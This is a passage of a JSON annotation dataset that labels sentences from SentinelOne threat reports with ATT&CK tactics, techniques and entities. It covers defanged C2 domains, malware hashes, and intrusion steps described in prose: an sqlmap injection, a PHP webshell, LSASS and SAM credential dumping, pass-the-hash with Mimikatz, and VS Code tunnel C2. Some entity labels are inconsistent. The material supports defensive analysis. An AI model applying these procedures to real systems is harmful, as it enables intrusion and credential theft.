"tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "sentinel-61_SentinelOne_report-p1-s120-f480e6", "source": "sentinel", "doc_id": "61_SentinelOne_report", "page_number": 1, "sentence_id": 120, "context_before": "Phil has been closely following the development of macOS threats as well as researching Mac software and OS vulnerabilities since 2014.", "sentence_text": "Raffaele Sabato\nRaffaele Sabato is a Senior Detection Engineer at SentinelOne, specializing in macOS malware and application exploitation.", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "sentinel-61_SentinelOne_report-p1-s121-0e5199", "source": "sentinel", "doc_id": "61_SentinelOne_report", "page_number": 1, "sentence_id": 121, "context_before": "Raffaele Sabato\nRaffaele Sabato is a Senior Detection Engineer at SentinelOne, specializing in macOS malware and application exploitation.", "sentence_text": "He began his journey into Apple security as an offensive security consultant, performing vulnerability research with a focus on macOS and iOS applications.", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "sentinel-61_SentinelOne_report-p1-s122-39eb3e", "source": "sentinel", "doc_id": "61_SentinelOne_report", "page_number": 1, "sentence_id": 122, "context_before": "He began his journey into Apple security as an offensive security consultant, performing vulnerability research with a focus on macOS and iOS applications.", "sentence_text": "His research includes studying novel attack vectors and developing new detection methods.", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "sentinel-61_SentinelOne_report-p1-s123-03ecab", "source": "sentinel", "doc_id": "61_SentinelOne_report", "page_number": 1, "sentence_id": 123, "context_before": "His research includes studying novel attack vectors and developing new detection methods.", "sentence_text": "August 04 2025 China’s Covert Capabilities | Silk Spun From Hafnium July 30 2025 Follow the Smoke | China-nexus Threat Actors Hammer At the Doors of Top Tier Targets June 09 2025 [FILTERED_TABLES_START]\ndataupload[.]store | upl/tlgrm C2 firstfromsep[.]online | netchk C2 safeup[.]store | CoreKit C2 support[.]us05web-zoom[.]pro | zoom_sdk_support.scpt C2", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "sentinel-61_SentinelOne_report-p1-s124-e8344d", "source": "sentinel", "doc_id": "61_SentinelOne_report", "page_number": 1, "sentence_id": 124, "context_before": "August 04 2025 China’s Covert Capabilities | Silk Spun From Hafnium July 30 2025 Follow the Smoke | China-nexus Threat Actors Hammer At the Doors of Top Tier Targets June 09 2025 [FILTERED_TABLES_START]\ndataupload[.]store | upl/tlgrm C2 firstfromsep[.]online | netchk C2 safeup[.]store | CoreKit C2 support[.]us05web-zoom[.]pro | zoom_sdk_support.scpt C2", "sentence_text": "writeup[.]live | CoreKit C2 027d4020f2dd1eb473636bc112a84f0a90b6651c | trojan1_arm64 (x86_64)\n0602a5b8f089f957eeda51f81ac0f9ad4e336b87", "relevant": "yes", "tactic": [ { "id": "TA0011", "name": "Command and Control" } ], "techniques": [ { "id": "T1071.001", "name": "Web Protocols" } ], "procedure": "C2 domain associated with CoreKit malware", "entities": [ { "text": "CoreKit", "start": 17, "end": 24, "label": "MalwareTool" }, { "text": "trojan1_arm64 (x86_64)", "start": 71, "end": 93, "label": "MalwareTool" }, { "text": "writeup[.]live", "start": 0, "end": 14, "label": "Infrastructure_Indicator" } ] }, { "uid": "sentinel-61_SentinelOne_report-p1-s125-bb8289", "source": "sentinel", "doc_id": "61_SentinelOne_report", "page_number": 1, "sentence_id": 125, "context_before": "writeup[.]live | CoreKit C2 027d4020f2dd1eb473636bc112a84f0a90b6651c | trojan1_arm64 (x86_64)\n0602a5b8f089f957eeda51f81ac0f9ad4e336b87", "sentence_text": "| GoogIe LLC (universal)\n06566eabf54caafe36ebe94430d392b9cf3426ba | installer (universal)\n08af4c21cd0a165695c756b6fda37016197b01e7 | installer (universal)\n16a6b0023ba3fde15bd0bba1b17a18bfa00a8f59 | GoogIe LLC (arm64)\n1a5392102d57e9ea4dd33d3b7181d66b4d08d01d | CoreKitAgent (x86_64)\n2c0177b302c4643c49dd7016530a4749298d964c | CoreKitAgent (arm64)\n2d746dda85805c79b5f6ea376f97d9b2f547da5d | netchk (arm64)\n2ed2edec8ccc44292410042c730c190027b87930 | trojan1_arm64 (arm64)\n3168e996cb20bd7b4208d0864e962a4b70c5a0e7 | GoogIe", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "sentinel-61_SentinelOne_report-p1-s126-29bde0", "source": "sentinel", "doc_id": "61_SentinelOne_report", "page_number": 1, "sentence_id": 126, "context_before": "| GoogIe LLC (universal)\n06566eabf54caafe36ebe94430d392b9cf3426ba | installer (universal)\n08af4c21cd0a165695c756b6fda37016197b01e7 | installer (universal)\n16a6b0023ba3fde15bd0bba1b17a18bfa00a8f59 | GoogIe LLC (arm64)\n1a5392102d57e9ea4dd33d3b7181d66b4d08d01d | CoreKitAgent (x86_64)\n2c0177b302c4643c49dd7016530a4749298d964c | CoreKitAgent (arm64)\n2d746dda85805c79b5f6ea376f97d9b2f547da5d | netchk (arm64)\n2ed2edec8ccc44292410042c730c190027b87930 | trojan1_arm64 (arm64)\n3168e996cb20bd7b4208d0864e962a4b70c5a0e7 | GoogIe", "sentence_text": "LLC (x86_64)\n5b16e9d6e92be2124ba496bf82d38fb35681c7ad | a (universal)\n7c04225a62b953e1268653f637b569a3b2eb06f8 | installer (arm64)\n945fcd3e08854a081c04c06eeb95ad6e0d9cdc19 | CoreKitAgent (universal)\na25c06e8545666d6d2a88c8da300cf3383149d5a | CoreKitAgent (universal)\nc9540dee9bdb28894332c5a74f696b4f94e4680c | GoogIe_LLC (universal)\ne227e2e4a6ffb7280dfe7618be20514823d3e4f5 | installer (x86_64)", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "sentinel-61_SentinelOne_report-p1-s127-b1ba4b", "source": "sentinel", "doc_id": "61_SentinelOne_report", "page_number": 1, "sentence_id": 127, "context_before": "LLC (x86_64)\n5b16e9d6e92be2124ba496bf82d38fb35681c7ad | a (universal)\n7c04225a62b953e1268653f637b569a3b2eb06f8 | installer (arm64)\n945fcd3e08854a081c04c06eeb95ad6e0d9cdc19 | CoreKitAgent (universal)\na25c06e8545666d6d2a88c8da300cf3383149d5a | CoreKitAgent (universal)\nc9540dee9bdb28894332c5a74f696b4f94e4680c | GoogIe_LLC (universal)\ne227e2e4a6ffb7280dfe7618be20514823d3e4f5 | installer (x86_64)", "sentence_text": "ee3795f6418fc0cacbe884a8eb803498c2b5776f | netchk (x86_64)\n023a15ac687e2d2e187d03e9976a89ef5f6c1617 | zoom_sdk_support.scpt bb72ca0e19a95c48a9ee4fd658958a0ae2af44b6 | tlgm 4743d5202dbe565721d75f7fb1eca43266a652d4 | upl 1e76f497051829fa804e72b9d14f44da5a531df8 | expl (upl variant)", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "sentinel-61_SentinelOne_report-p1-s128-1dc18a", "source": "sentinel", "doc_id": "61_SentinelOne_report", "page_number": 1, "sentence_id": 128, "context_before": "ee3795f6418fc0cacbe884a8eb803498c2b5776f | netchk (x86_64)\n023a15ac687e2d2e187d03e9976a89ef5f6c1617 | zoom_sdk_support.scpt bb72ca0e19a95c48a9ee4fd658958a0ae2af44b6 | tlgm 4743d5202dbe565721d75f7fb1eca43266a652d4 | upl 1e76f497051829fa804e72b9d14f44da5a531df8 | expl (upl variant)", "sentence_text": "79f37e0b728de2c5a4bfe8fcf292941d54e121b8 | upl (upl variant)", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "sentinel-62_SentinelOne_report-p1-s2-b1a026", "source": "sentinel", "doc_id": "62_SentinelOne_report", "page_number": 1, "sentence_id": 2, "context_before": "Executive Summary", "sentence_text": "The intrusions could have enabled the adversaries to establish strategic footholds and compromise downstream entities.", "relevant": "yes", "tactic": [ { "id": "TA0003", "name": "Persistence" }, { "id": "TA0001", "name": "Initial Access" } ], "techniques": null, "procedure": "Adversaries could establish strategic footholds and compromise downstream entities.", "entities": [ { "text": "adversaries", "start": 38, "end": 49, "label": "ThreatActor" }, { "text": "establish strategic footholds", "start": 53, "end": 82, "label": "Action" }, { "text": "compromise downstream entities", "start": 87, "end": 117, "label": "Action" } ] }, { "uid": "sentinel-62_SentinelOne_report-p1-s3-e3ede0", "source": "sentinel", "doc_id": "62_SentinelOne_report", "page_number": 1, "sentence_id": 3, "context_before": "The intrusions could have enabled the adversaries to establish strategic footholds and compromise downstream entities.", "sentence_text": "SentinelLABS and Tinexta Cyber detected and interrupted the activities in their initial phases.", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "sentinel-62_SentinelOne_report-p1-s4-26bf97", "source": "sentinel", "doc_id": "62_SentinelOne_report", "page_number": 1, "sentence_id": 4, "context_before": "SentinelLABS and Tinexta Cyber detected and interrupted the activities in their initial phases.", "sentence_text": "The threat actors used a lateral movement capability indicative of the presence of a shared vendor or digital quartermaster maintaining and provisioning tooling within the Chinese APT ecosystem.", "relevant": "yes", "tactic": [ { "id": "TA0008", "name": "Lateral Movement" } ], "techniques": [ { "id": "T1021", "name": "Remote Services" } ], "procedure": "used a lateral movement capability indicative of the presence of a shared vendor or digital quartermaster maintaining and provisioning tooling", "entities": [ { "text": "threat actors", "start": 4, "end": 17, "label": "ThreatActor" }, { "text": "used a lateral movement capability", "start": 18, "end": 52, "label": "Action" }, { "text": "maintaining and provisioning tooling within the Chinese APT ecosystem.", "start": 124, "end": 194, "label": "Action" } ] }, { "uid": "sentinel-62_SentinelOne_report-p1-s5-4c57a8", "source": "sentinel", "doc_id": "62_SentinelOne_report", "page_number": 1, "sentence_id": 5, "context_before": "The threat actors used a lateral movement capability indicative of the presence of a shared vendor or digital quartermaster maintaining and provisioning tooling within the Chinese APT ecosystem.", "sentence_text": "The threat actors abused Visual Studio Code and Microsoft Azure infrastructure for C2 purposes, attempting to evade detection by making malicious activities appear legitimate.", "relevant": "yes", "tactic": [ { "id": "TA0005", "name": "Defense Evasion" }, { "id": "TA0011", "name": "Command and Control" } ], "techniques": [ { "id": "T1071.001", "name": "Web Protocols" } ], "procedure": "abused Visual Studio Code and Microsoft Azure infrastructure for C2; attempted to evade detection", "entities": [ { "text": "threat actors", "start": 4, "end": 17, "label": "ThreatActor" }, { "text": "Visual Studio Code and Microsoft Azure infrastructure", "start": 25, "end": 78, "label": "Infrastructure_Indicator" }, { "text": "abused Visual Studio Code and Microsoft Azure infrastructure for C2 purposes,", "start": 18, "end": 95, "label": "Action" }, { "text": "attempting to evade detection by making malicious activities appear legitimate", "start": 96, "end": 174, "label": "Action" } ] }, { "uid": "sentinel-62_SentinelOne_report-p1-s6-3611df", "source": "sentinel", "doc_id": "62_SentinelOne_report", "page_number": 1, "sentence_id": 6, "context_before": "The threat actors abused Visual Studio Code and Microsoft Azure infrastructure for C2 purposes, attempting to evade detection by making malicious activities appear legitimate.", "sentence_text": "Our visibility suggests that the abuse of Visual Studio Code for C2 purposes had been relatively rare in the wild prior to this campaign.", "relevant": "yes", "tactic": [ { "id": "TA0011", "name": "Command and Control" } ], "techniques": [ { "id": "T1071.001", "name": "Web Protocols" } ], "procedure": "abuse of Visual Studio Code for C2 purposes (rare prior to this campaign)", "entities": [ { "text": "Visual Studio Code", "start": 42, "end": 60, "label": "MalwareTool" }, { "text": "abuse of Visual Studio Code for C2 purposes", "start": 33, "end": 76, "label": "Action" } ] }, { "uid": "sentinel-62_SentinelOne_report-p1-s7-5b463b", "source": "sentinel", "doc_id": "62_SentinelOne_report", "page_number": 1, "sentence_id": 7, "context_before": "Our visibility suggests that the abuse of Visual Studio Code for C2 purposes had been relatively rare in the wild prior to this campaign.", "sentence_text": "Operation Digital Eye marks the first instance of a suspected Chinese APT group using this technique that we have directly observed.", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "sentinel-62_SentinelOne_report-p1-s8-16d1a0", "source": "sentinel", "doc_id": "62_SentinelOne_report", "page_number": 1, "sentence_id": 8, "context_before": "Operation Digital Eye marks the first instance of a suspected Chinese APT group using this technique that we have directly observed.", "sentence_text": "Overview\nTinexta Cyber and SentinelLABS have been tracking threat activities targeting business-to-business IT service providers in Southern Europe.", "relevant": "yes", "tactic": [ { "id": "TA0043", "name": "Reconnaissance" } ], "techniques": [ { "id": "T1591", "name": "Gather Victim Org Information" } ], "procedure": "targeting business-to-business IT service providers", "entities": [ { "text": "threat activities targeting business-to-business IT service providers", "start": 59, "end": 128, "label": "Action" } ] }, { "uid": "sentinel-62_SentinelOne_report-p1-s9-a44083", "source": "sentinel", "doc_id": "62_SentinelOne_report", "page_number": 1, "sentence_id": 9, "context_before": "Overview\nTinexta Cyber and SentinelLABS have been tracking threat activities targeting business-to-business IT service providers in Southern Europe.", "sentence_text": "A sustained presence within these organizations would provide the Operation Digital Eye actors with a strategic foothold, creating opportunities for intrusions across the digital supply chain and enabling them to exert control over critical IT processes within the downstream compromised entities.", "relevant": "yes", "tactic": [ { "id": "TA0003", "name": "Persistence" }, { "id": "TA0008", "name": "Lateral Movement" }, { "id": "TA0040", "name": "Impact" } ], "techniques": [ { "id": "T1199", "name": "Trusted Relationship" } ], "procedure": "exert control over critical IT processes", "entities": [ { "text": "Operation Digital Eye actors", "start": 66, "end": 94, "label": "ThreatActor" }, { "text": "sustained presence within these organizations", "start": 2, "end": 47, "label": "Action" }, { "text": "creating opportunities for intrusions across the digital supply chain", "start": 122, "end": 191, "label": "Action" }, { "text": "enabling them to exert control over critical IT processes", "start": 196, "end": 253, "label": "Action" } ] }, { "uid": "sentinel-62_SentinelOne_report-p1-s10-ca3850", "source": "sentinel", "doc_id": "62_SentinelOne_report", "page_number": 1, "sentence_id": 10, "context_before": "A sustained presence within these organizations would provide the Operation Digital Eye actors with a strategic foothold, creating opportunities for intrusions across the digital supply chain and enabling them to exert control over critical IT processes within the downstream compromised entities.", "sentence_text": "The attacks were detected and disrupted during their initial phases.", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "sentinel-62_SentinelOne_report-p1-s11-4674b0", "source": "sentinel", "doc_id": "62_SentinelOne_report", "page_number": 1, "sentence_id": 11, "context_before": "The attacks were detected and disrupted during their initial phases.", "sentence_text": "The malware and tooling used in these campaigns have been linked to several distinct Chinese APT groups.", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "sentinel-62_SentinelOne_report-p1-s12-d25e4b", "source": "sentinel", "doc_id": "62_SentinelOne_report", "page_number": 1, "sentence_id": 12, "context_before": "The malware and tooling used in these campaigns have been linked to several distinct Chinese APT groups.", "sentence_text": "We collectively refer to these custom Mimikatz modifications as mimCN.", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "sentinel-62_SentinelOne_report-p1-s13-64659e", "source": "sentinel", "doc_id": "62_SentinelOne_report", "page_number": 1, "sentence_id": 13, "context_before": "We collectively refer to these custom Mimikatz modifications as mimCN.", "sentence_text": "The abuse of Visual Studio Code Remote Tunnels for C2 purposes is central to this campaign.", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "sentinel-62_SentinelOne_report-p1-s14-39d3a0", "source": "sentinel", "doc_id": "62_SentinelOne_report", "page_number": 1, "sentence_id": 14, "context_before": "The abuse of Visual Studio Code Remote Tunnels for C2 purposes is central to this campaign.", "sentence_text": "As a result, this technique may be challenging to detect and could evade security defenses.", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "sentinel-62_SentinelOne_report-p1-s15-725fc1", "source": "sentinel", "doc_id": "62_SentinelOne_report", "page_number": 1, "sentence_id": 15, "context_before": "As a result, this technique may be challenging to detect and could evade security defenses.", "sentence_text": "Combined with the full endpoint access it provides, this makes Visual Studio Code tunneling an attractive and powerful capability for threat actors to exploit.", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "sentinel-62_SentinelOne_report-p1-s16-4424e9", "source": "sentinel", "doc_id": "62_SentinelOne_report", "page_number": 1, "sentence_id": 16, "context_before": "Combined with the full endpoint access it provides, this makes Visual Studio Code tunneling an attractive and powerful capability for threat actors to exploit.", "sentence_text": "Tinexta Cyber and SentinelLABS have notified Microsoft about the abuse of Visual Studio Code and Azure infrastructure in connection with Operation Digital Eye.", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "sentinel-62_SentinelOne_report-p1-s17-337f8c", "source": "sentinel", "doc_id": "62_SentinelOne_report", "page_number": 1, "sentence_id": 17, "context_before": "Tinexta Cyber and SentinelLABS have notified Microsoft about the abuse of Visual Studio Code and Azure infrastructure in connection with Operation Digital Eye.", "sentence_text": "Infection Vector and Attack Progression", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "sentinel-62_SentinelOne_report-p1-s18-d6a06c", "source": "sentinel", "doc_id": "62_SentinelOne_report", "page_number": 1, "sentence_id": 18, "context_before": "Infection Vector and Attack Progression", "sentence_text": "The attackers used SQL (Structured Query Language) injection as an initial access vector to infiltrate Internet-facing web and database servers.", "relevant": "yes", "tactic": [ { "id": "TA0001", "name": "Initial Access" } ], "techniques": [ { "id": "T1190", "name": "Exploit Public-Facing Application" } ], "procedure": "SQL injection used to gain initial access", "entities": [ { "text": "The attackers", "start": 0, "end": 13, "label": "ThreatActor" }, { "text": "Internet-facing web and database servers", "start": 103, "end": 143, "label": "Infrastructure_Indicator" }, { "text": "used SQL (Structured Query Language) injection as an initial access vector to infiltrate", "start": 14, "end": 102, "label": "Action" }, { "text": "used SQL (Structured Query Language) injection", "start": 14, "end": 60, "label": "MalwareTool" } ] }, { "uid": "sentinel-62_SentinelOne_report-p1-s19-cfd549", "source": "sentinel", "doc_id": "62_SentinelOne_report", "page_number": 1, "sentence_id": 19, "context_before": "The attackers used SQL (Structured Query Language) injection as an initial access vector to infiltrate Internet-facing web and database servers.", "sentence_text": "User-Agent\nrequest headers in the web traffic logs we retrieved indicate that the attackers used the sqlmap tool to automate the detection and exploitation of SQL injection vulnerabilities.", "relevant": "yes", "tactic": [ { "id": "TA0001", "name": "Initial Access" } ], "techniques": [ { "id": "T1190", "name": "Exploit Public-Facing Application" } ], "procedure": "Used sqlmap to automate SQL injection detection and exploitation", "entities": [ { "text": "attackers", "start": 82, "end": 91, "label": "ThreatActor" }, { "text": "sqlmap", "start": 101, "end": 107, "label": "MalwareTool" }, { "text": "web traffic logs ", "start": 34, "end": 51, "label": "Infrastructure_Indicator" }, { "text": "request headers", "start": 11, "end": 26, "label": "Infrastructure_Indicator" }, { "text": "used the sqlmap tool to automate the detection and exploitation", "start": 92, "end": 155, "label": "Action" } ] }, { "uid": "sentinel-62_SentinelOne_report-p1-s20-193ec5", "source": "sentinel", "doc_id": "62_SentinelOne_report", "page_number": 1, "sentence_id": 20, "context_before": "User-Agent\nrequest headers in the web traffic logs we retrieved indicate that the attackers used the sqlmap tool to automate the detection and exploitation of SQL injection vulnerabilities.", "sentence_text": "To establish an initial foothold and maintain persistent access, the threat actors deployed a PHP-based webshell.", "relevant": "yes", "tactic": [ { "id": "TA0001", "name": "Initial Access" }, { "id": "TA0003", "name": "Persistence" } ], "techniques": [ { "id": "T1505.003", "name": "Web Shell" } ], "procedure": "Deployed a PHP-based webshell to establish foothold and maintain persistent access", "entities": [ { "text": " the threat actors", "start": 64, "end": 82, "label": "ThreatActor" }, { "text": "PHP-based webshell.", "start": 94, "end": 113, "label": "MalwareTool" }, { "text": "deployed a PHP-based webshell.", "start": 83, "end": 113, "label": "Action" } ] }, { "uid": "sentinel-62_SentinelOne_report-p1-s21-2e58c9", "source": "sentinel", "doc_id": "62_SentinelOne_report", "page_number": 1, "sentence_id": 21, "context_before": "To establish an initial foothold and maintain persistent access, the threat actors deployed a PHP-based webshell.", "sentence_text": "Relatively simple in design and implementation, the webshell uses the assert function to execute attacker-provided PHP code.", "relevant": "yes", "tactic": [ { "id": "TA0002", "name": "Execution" }, { "id": "TA0003", "name": "Persistence" } ], "techniques": [ { "id": "T1505.003", "name": "Web Shell" } ], "procedure": "Executing attacker-provided PHP code via the webshell using the assert function", "entities": [ { "text": "webshell", "start": 52, "end": 60, "label": "MalwareTool" }, { "text": "uses the assert function to execute attacker-provided PHP code", "start": 61, "end": 123, "label": "Action" } ] }, { "uid": "sentinel-62_SentinelOne_report-p1-s22-2b011c", "source": "sentinel", "doc_id": "62_SentinelOne_report", "page_number": 1, "sentence_id": 22, "context_before": "Relatively simple in design and implementation, the webshell uses the assert function to execute attacker-provided PHP code.", "sentence_text": "Its implementation does not resemble any other webshells we are familiar with.", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "sentinel-62_SentinelOne_report-p1-s23-f664f5", "source": "sentinel", "doc_id": "62_SentinelOne_report", "page_number": 1, "sentence_id": 23, "context_before": "Its implementation does not resemble any other webshells we are familiar with.", "sentence_text": "We track this webshell under the name PHPsert.", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "sentinel-62_SentinelOne_report-p1-s24-8be9d1", "source": "sentinel", "doc_id": "62_SentinelOne_report", "page_number": 1, "sentence_id": 24, "context_before": "We track this webshell under the name PHPsert.", "sentence_text": "To disguise the files implementing PHPsert and attempt to evade detection based on filesystem activity, the attackers used custom names tailored to the infiltrated environments, making the filenames appear legitimate.", "relevant": "yes", "tactic": [ { "id": "TA0005", "name": "Defense Evasion" } ], "techniques": [ { "id": "T1036", "name": "Masquerading" } ], "procedure": "Disguised PHPsert files using custom filenames to evade detection", "entities": [ { "text": "the attackers", "start": 104, "end": 117, "label": "ThreatActor" }, { "text": "PHPsert", "start": 35, "end": 42, "label": "MalwareTool" }, { "text": "used custom names tailored to the infiltrated environments, making the filenames appear legitimate.", "start": 118, "end": 217, "label": "Action" }, { "text": "evade detection ", "start": 58, "end": 74, "label": "Action" } ] }, { "uid": "sentinel-62_SentinelOne_report-p1-s25-4d3e67", "source": "sentinel", "doc_id": "62_SentinelOne_report", "page_number": 1, "sentence_id": 25, "context_before": "To disguise the files implementing PHPsert and attempt to evade detection based on filesystem activity, the attackers used custom names tailored to the infiltrated environments, making the filenames appear legitimate.", "sentence_text": "This included using the local language and terms that aligned with the technological context of the targeted organizations.", "relevant": "yes", "tactic": [ { "id": "TA0005", "name": "Defense Evasion" } ], "techniques": [ { "id": "T1036", "name": "Masquerading" } ], "procedure": "Attackers use local-language and context-aligned terms in filenames to make malicious files appear legitimate.", "entities": [ { "text": "using the local language", "start": 14, "end": 38, "label": "Action" } ] }, { "uid": "sentinel-62_SentinelOne_report-p1-s26-4c5a81", "source": "sentinel", "doc_id": "62_SentinelOne_report", "page_number": 1, "sentence_id": 26, "context_before": "This included using the local language and terms that aligned with the technological context of the targeted organizations.", "sentence_text": "They also deployed the local.exe tool, which is part of the Microsoft Windows NT Resource Kit and allows for viewing user group memberships.", "relevant": "yes", "tactic": [ { "id": "TA0007", "name": "Discovery" } ], "techniques": [ { "id": "T1069", "name": "Permission Groups Discovery" } ], "procedure": "Deployed local.exe to enumerate user group memberships", "entities": [ { "text": "They", "start": 0, "end": 4, "label": "ThreatActor" }, { "text": "local.exe", "start": 23, "end": 32, "label": "MalwareTool" }, { "text": "deployed", "start": 10, "end": 18, "label": "Action" } ] }, { "uid": "sentinel-62_SentinelOne_report-p1-s27-1a9969", "source": "sentinel", "doc_id": "62_SentinelOne_report", "page_number": 1, "sentence_id": 27, "context_before": "They also deployed the local.exe tool, which is part of the Microsoft Windows NT Resource Kit and allows for viewing user group memberships.", "sentence_text": "To steal credentials, the attackers used the CreateDump tool to extract memory allocated to the Local Security Authority Subsystem Service (LSASS) process and exfiltrate credentials.", "relevant": "yes", "tactic": [ { "id": "TA0006", "name": "Credential Access" } ], "techniques": [ { "id": "T1003", "name": "OS Credential Dumping" } ], "procedure": "Used CreateDump to dump LSASS memory and exfiltrate credentials", "entities": [ { "text": "the attackers", "start": 22, "end": 35, "label": "ThreatActor" }, { "text": "CreateDump", "start": 45, "end": 55, "label": "MalwareTool" }, { "text": "Local Security Authority Subsystem Service (LSASS) process ", "start": 96, "end": 155, "label": "Infrastructure_Indicator" }, { "text": "used the CreateDump tool to extract memory allocated to the Local Security Authority Subsystem Service (LSASS) process and exfiltrate credentials.", "start": 36, "end": 182, "label": "Action" } ] }, { "uid": "sentinel-62_SentinelOne_report-p1-s28-dfb5cb", "source": "sentinel", "doc_id": "62_SentinelOne_report", "page_number": 1, "sentence_id": 28, "context_before": "To steal credentials, the attackers used the CreateDump tool to extract memory allocated to the Local Security Authority Subsystem Service (LSASS) process and exfiltrate credentials.", "sentence_text": "CreateDump\nis part of the Microsoft .NET Framework distribution.", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "sentinel-62_SentinelOne_report-p1-s29-826432", "source": "sentinel", "doc_id": "62_SentinelOne_report", "page_number": 1, "sentence_id": 29, "context_before": "CreateDump\nis part of the Microsoft .NET Framework distribution.", "sentence_text": "The threat actors also retrieved credentials from the Security Account Manager (SAM) database, which they extracted from the Windows Registry using the reg save command The threat actors frequently named the files they deployed using the pattern do.", "relevant": "yes", "tactic": [ { "id": "TA0005", "name": "Defense Evasion" }, { "id": "TA0006", "name": "Credential Access" } ], "techniques": [ { "id": "T1003", "name": "OS Credential Dumping" }, { "id": "T1036", "name": "Masquerading" } ], "procedure": "Extracted SAM database using reg save\n\nRetrieved credentials from SAM\n\nNamed deployed files using pattern “do”", "entities": [ { "text": "The threat actors", "start": 0, "end": 17, "label": "ThreatActor" }, { "text": "reg save", "start": 152, "end": 160, "label": "MalwareTool" }, { "text": "retrieved credentials", "start": 23, "end": 44, "label": "Action" }, { "text": "extracted from the Windows Registry using the reg save command", "start": 106, "end": 168, "label": "Action" }, { "text": "named the files", "start": 198, "end": 213, "label": "Action" } ] }, { "uid": "sentinel-62_SentinelOne_report-p1-s31-e0d105", "source": "sentinel", "doc_id": "62_SentinelOne_report", "page_number": 1, "sentence_id": 31, "context_before": "* .", "sentence_text": "Examples include do.log (output from ping commands), do.exe (the CreateDump tool), and do.bat (a script that executes and deletes the CreateDump executable).", "relevant": "yes", "tactic": [ { "id": "TA0005", "name": "Defense Evasion" } ], "techniques": [ { "id": "T1036", "name": "Masquerading" } ], "procedure": "Use of files named do.log, do.exe, and do.bat as part of attacker tooling", "entities": [ { "text": "do.exe (the CreateDump tool)", "start": 53, "end": 81, "label": "MalwareTool" }, { "text": "do.bat", "start": 87, "end": 93, "label": "MalwareTool" }, { "text": "CreateDump executable", "start": 134, "end": 155, "label": "MalwareTool" }, { "text": "do.exe (the CreateDump tool), and do.bat", "start": 53, "end": 93, "label": "Infrastructure_Indicator" }, { "text": "executes and deletes", "start": 109, "end": 129, "label": "Action" } ] }, { "uid": "sentinel-62_SentinelOne_report-p1-s32-c7e3dd", "source": "sentinel", "doc_id": "62_SentinelOne_report", "page_number": 1, "sentence_id": 32, "context_before": "Examples include do.log (output from ping commands), do.exe (the CreateDump tool), and do.bat (a script that executes and deletes the CreateDump executable).", "sentence_text": "From the initially compromised endpoints, the attackers moved laterally across the internal network, primarily using RDP (Remote Desktop Protocol) connections and pass-the-hash techniques.", "relevant": "yes", "tactic": [ { "id": "TA0008", "name": "Lateral Movement" } ], "techniques": [ { "id": "T1550.002", "name": "Pass the Hash" } ], "procedure": "moved laterally using RDP and pass-the-hash", "entities": [ { "text": " the attackers", "start": 41, "end": 55, "label": "ThreatActor" }, { "text": "RDP (Remote Desktop Protocol) connections ", "start": 117, "end": 159, "label": "Infrastructure_Indicator" }, { "text": "moved laterally", "start": 56, "end": 71, "label": "Action" }, { "text": " using RDP", "start": 110, "end": 120, "label": "Action" }, { "text": "pass-the-hash techniques.", "start": 163, "end": 188, "label": "Action" } ] }, { "uid": "sentinel-62_SentinelOne_report-p1-s33-424f40", "source": "sentinel", "doc_id": "62_SentinelOne_report", "page_number": 1, "sentence_id": 33, "context_before": "From the initially compromised endpoints, the attackers moved laterally across the internal network, primarily using RDP (Remote Desktop Protocol) connections and pass-the-hash techniques.", "sentence_text": "For the pass-the-hash attacks, they used a custom modified version of Mimikatz, implemented in an executable named bK2o.exe In addition to the PHPsert webshell, the threat actors used two methods for remote command execution: SSH access, enabled by deploying authorized_keys files containing public keys for authentication, and Visual Studio Code Remote Tunnels.", "relevant": "yes", "tactic": [ { "id": "TA0002", "name": "Execution" }, { "id": "TA0006", "name": "Credential Access" } ], "techniques": [ { "id": "T1550.002", "name": "Pass the Hash" } ], "procedure": "used a custom modified version of Mimikatz (bK2o.exe) and executed commands remotely using SSH authorized_keys and VS Code Remote Tunnels", "entities": [ { "text": "threat actors", "start": 165, "end": 178, "label": "ThreatActor" }, { "text": "they", "start": 31, "end": 35, "label": "ThreatActor" }, { "text": "Mimikatz", "start": 70, "end": 78, "label": "MalwareTool" }, { "text": "bK2o.exe", "start": 115, "end": 123, "label": "MalwareTool" }, { "text": "PHPsert", "start": 143, "end": 150, "label": "MalwareTool" }, { "text": "SSH access", "start": 226, "end": 236, "label": "Infrastructure_Indicator" }, { "text": "authorized_keys files", "start": 259, "end": 280, "label": "Infrastructure_Indicator" }, { "text": "public keys", "start": 292, "end": 303, "label": "Infrastructure_Indicator" }, { "text": "Visual Studio Code Remote Tunnels", "start": 328, "end": 361, "label": "Infrastructure_Indicator" }, { "text": "used a custom modified version of Mimikatz", "start": 36, "end": 78, "label": "Action" }, { "text": "mplemented in an executable named bK2o.exe", "start": 81, "end": 123, "label": "Action" }, { "text": "used two methods for remote command execution", "start": 179, "end": 224, "label": "Action" }, { "text": "deploying authorized_keys files", "start": 249, "end": 280, "label": "Action" }, { "text": " SSH access, enabled by deploying authorized_keys files containing public keys for authentication", "start": 225, "end": 322, "label": "Action" } ] }, { "uid": 